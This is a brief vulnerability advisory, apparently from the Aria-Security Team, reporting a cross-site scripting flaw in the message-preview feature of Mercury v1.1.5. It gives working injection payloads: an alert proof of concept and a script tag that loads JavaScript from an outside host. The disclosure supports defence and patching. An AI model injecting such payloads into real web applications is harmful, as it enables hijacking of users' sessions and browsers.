Mercury version 1.1.5 suffers from a cross site scripting vulnerability.
510e732e904e6d5c3f001878fd450dc9bd0a532bf41b367e5ea2b3bf2e45e26c
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
---------------------------------------------
Greetz: Aura, imm02tal, iM4n, Mormoroth,
Mercury v1.1.5 Send Message Cross-Site Scripting
In order to make this vuln work you need to place your code in the "message text" area and press preview
Examples:
<script src=http://Aria-Security.net/test.js></script>
<script>alert('Aria-Security Team')</script>
Regards,
The-0utl4w
Aria-Security.Net
(Credits Goes To Aria-Security Team)
----------------------------
More Info @ http://forum.aria-security.net/forumdisplay.php?f=60